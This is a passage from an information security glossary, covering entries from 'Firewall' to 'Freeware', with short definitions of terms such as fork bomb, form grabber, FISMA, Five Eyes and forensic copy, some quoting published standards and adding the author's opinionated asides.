data may fail to be distinguished in practice. Furthermore, being
biometrics, confidentiality
is a challenge for the owner
and they cannot be changed if compromised.
See also hash.
|
|
FIPS
197 (Federal Information Processing Standard № 197)
|
Standard
published by NIST in 2001 specifying AES.
See http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
|
|
Fire
|
Along with smoke, one of many physical security threats, whether caused by accident or
intentionally (arson).
See also flood, intruder and malicious damage.
|
|
Fireball
|
One of several nasty species of malware in the wild in 2018. A browser hijacker
and downloader.
|
|
Firewall
|
Specialized network
router specifically configured as a security gateway monitoring, controlling and filtering traffic between
network segments,
nodes and devices
according to a set of access
control rules.
“Type of security barrier placed between network environments --
consisting of a dedicated device or a composite of several components and
techniques -- through which all traffic from one network environment
traverses to another, and vice versa, and only authorized traffic, as defined
by the local security policy, is allowed to pass” (ISO/IEC 27033-1). A
network protection device that filters incoming and outgoing network data,
based on a series of rules” (NZ information Security Manual).
See also packet filter, stateful firewall and deep packet
inspection.
|
|
Firmware
|
Software
loaded into a memory chip or similar hardware device, normally embedded in hardware
interfaces to control
and communicate with specialist devices such as plant controllers, disk
drives or network
cards. The BIOS on
a computer motherboard is an example. “Software embedded in a hardware
device” (NZ information Security Manual).
|
|
FISA
(Foreign Intelligence Surveillance Act)
|
US law unilaterally permitting the US government to snoop on foreigners’ information for
US intelligence,
counterterrorism
and (presumably) cyberwarfare,
economic, political or other purposes. Became law in 1978, amended in 2008.
Established the Foreign Intelligence Surveillance Court as a SECRET oversight body to mediate official access requests by
the NSA, CIA, FBI or other agencies/authorities.
|
|
FISMA
(Federal Information Security
Management Act)
|
US law imposing information risk-based security and privacy obligations on government agencies and,
to some extent, their suppliers. “A statute (Title III, P.L. 107-347)
that requires agencies to assess risk to information systems and provide
information security protections commensurate with the risk. FISMA also
requires that agencies integrate information security into their capital
planning and enterprise architecture processes, conduct annual information
systems security reviews of all programs and systems, and report the results
of those reviews to OMB.” (CNSSI-4009).
|
|
Five
Eyes
|
A strategic alliance/collaboration between the governments
of the USA, Canada, UK, Australia and New Zealand to share intelligence
capabilities and information.
Evolved from the UKUSA bilateral ‘special arrangement’ that had in effect
been in place since WWII or before. Whereas the security agencies are not
supposed to snoop
on their own citizens, they can do so via their Five Eyes partners – a
convenient means of bypassing the governance control.
|
|
Flash
memory [media]
|
Data
storage device
using a silicon chip as the media,
in a manner that retains the data indefinitely without consuming power, such
as a USB memory stick. “A specific type of EEPROM” (NZ information Security Manual).
|
|
Flaw
|
A fundamental and inherent vulnerability, weakness or failing. In
the context of software
security, flaws are generally errors
in the system design or
architecture that create or expose
information security
vulnerabilities. Flaws in corporate governance, risk management,
information
security management, business
continuity management etc. can result in an organisation’s
abject failure to characterize and treat reasonably foreseeable (let alone
unforeseeable) risks.
|
|
Flood
|
(a) A surprisingly common physical security threat. Due to global warming, the
number of natural disasters involving flooding has increased markedly in
recent years, while leaking pipes, blocked sewers and sprinkler systems
remain as prevalent as ever. See also fire, intruder and malicious damage. (b) Accidentally overwhelm an IT system or network with a high
volume of traffic, for example an abnormally high peak load on a
heavily-promoted website or a tsunami of spurious packets generated by a hardware error on a network node. (c) Deliberately
overwhelm an IT system or network with large volumes of generated traffic in
an attempt to cause a denial
of service or to slip a covert
attack past
failing security controls.
|
|
Fly
lead
|
“A lead that connects IT equipment to the fixed
infrastructure of the facility. For example, the lead that connects a
workstation to a network wall socket” (NZ information Security Manual).
|
|
FM-200
|
Fire
suppressant or extinguishant
chemical from DuPont popular in automated fire control systems.
|
|
FMEA
(Failure Mode Effects Analysis)
|
Structured bottom-up engineering method, pioneered by NASA, to analyse
potential reliability, safety or security
risks or issues
early in the system
development lifecycle, identifying how the system might possibly fail (e.g. due
to single points of failure).
Used to design
more resilient,
robust, secure and safe systems.
|
|
Foothold,
launch pad
stepping stone,
pivot point
|
The system
initially compromised
on a hacked network, from which
further probes and
attacks may be
launched. May be any vulnerable
networked system, including things,
multifunction
devices, desktops, portables, servers etc.
|
|
Forbid
|
Explicitly prohibit i.e. withhold consent, authorisation or
permission for
someone to do something, go somewhere etc. or face the consequences.
|
|
Forensic,
forensics
|
Relating to the law courts. See also digital forensics.
“The practice of gathering, retaining, and analyzing computer-related data
for investigative purposes in a manner that maintains the integrity of the
data” (CNSSI-4009).
|
|
Forensic
copy
|
More than just a copy of an item of forensic evidence,
a forensic
copy has been produced by a specific, forensically-sound method that gives an extremely high level
of assurance
that the copy is an authentic
and complete duplicate of the original – for example, a bitwise image
of a computer disk, created using a particular set of forensic tools, with a cryptographic hash value identical
to the original.
|
|
Forensic
evidence
|
Evidence
destined to be used in court. The legal system imposes strict integrity
requirements on evidence, requiring strong assurance measures such as a valid and
unbroken chain of
custody.
|
|
Forger
|
The fraudster
who commits forgery.
|
|
Forgery
|
Fraudulent
counterfeiting
of items such as negotiable instruments (e.g. banknotes), credentials etc.
|
|
Fork
bomb,
wabbit
|
Malware that spawns one or more copies of
itself and starts those copies running, thus exponentially increasing in
number until it exhausts finite system
resources and thus, generally, brings the entire system to a halt i.e. a
denial of service
attack.
|
|
Form
grabber, grabber,
form jacking
|
Malware that
captures data
entered by the system user into
online forms, particularly credentials used for authentication.
|
|
FOSS
(Free Open
Source Software)
|
Software
source code that its owner
deliberately publishes and permits or encourages others to use, change and
ideally improve as a collaborative public effort. ‘Free’ refers to liberty,
not necessarily price: some FOSS suppliers, for example, provide additional
chargeable services such as professional support and patching.
|
|
FOUO
(For Official
Use Only)
|
Deprecated
US government label applied to unclassified information containing content that may
have been exempt
from mandatory
disclosure
under the Freedom of Information Act. Replaced by CUI.
|
|
Frame
|
(a) Falsely yet credibly accuse someone of something
untoward, such as a crime, or deflect the blame their way in such a way that
they appear guilty whereas the guilty party appears innocent.
An integrity
failure. A form of social
engineering. (b) Permanent wooden or metal structure into which a
door or window may be fixed by hinges, catches and locks. The strength of the frame and its
fixture to the surrounding wall are critical to the ability of the door or
window to resist brute
force attacks,
fires, floods etc.
The entire structure, plus the associated processes (such as architecture and
design, operation and maintenance), constitutes a physical security control system.
|
|
Framework
|
A conceptual or physical structure or skeleton linking
related items together, providing a logical basis or foundation for further
construction, understanding and use. May involve models, blueprints,
architecture and design specifications, nodes and linkages, systems (such as management systems),
methods,
approaches, standards,
policies, guidelines etc.
May be theoretical or practical. Information
security frameworks typically concern governance, information risk, compliance, privacy and related matters, in whole or
in part.
|
|
Fraud,
con
|
Theft, misappropriation or similar crime involving deliberate
deception or misrepresentation
of the target by
a fraudster,
usually for unfair advantage or illegal gain. Many forms of fraud are
known e.g. assuming someone else’s name and masquerading as them (identity fraud); promising victims a large
payout on receipt of an advance
fee; causing victims unwittingly to call a premium-rate phone
number and so rack-up a large bill (toll fraud); tricking victims into
downloading malware
or visiting unsavoury/undesirable websites (click bait); falsifying or inflating
expenses claimed (expenses fraud); falsifying financial records (accounting
or tax fraud); substituting bank account numbers (payment fraud). See also scam.
|
|
Fraud recovery fraud
|
Follow-on fraud
in which fraudsters
typically claiming to be lawyers, barristers, police officers etc. promise
to help victims
of prior frauds recover their losses, prosecute the original fraudsters etc.
Fraud victims have, in effect, already demonstrated their naïveté,
gullibility and susceptibility in the earlier incidents and may still be ignorant or in
a psychological state of denial, hence being relatively vulnerable to
subsequent frauds by selfish heartless exploitative low-life pond scum
totally devoid of compassion.
|
|
Fraudster,
con artist
|
Deceitful,
deceptive person who commits or perpetrates fraud. Sometimes incorrectly called ‘the
fraud’ which, strictly speaking, is the incident not the perpetrator.
|
|
Freedom Of Information Act
(FOIA)
|
Laws in many jurisdictions require public bodies to disclose
potentially sensitive
information under certain conditions, typically for public interest reasons,
on request by a member of the public following the prescribed procedures. When
entire documents
or data sets are to
be disclosed under FOIA, it may be necessary to redact parts e.g. to safeguard
ongoing covert
operations and operatives (typically informers, moles and spies) or to protect privacy or national security.
|
|
Freeware
|
Software
that is legitimately
and legally free of usage restrictions, typically as a result of having been
released intentionally into the public domain by its owner.
|
|
Freezer
spray
|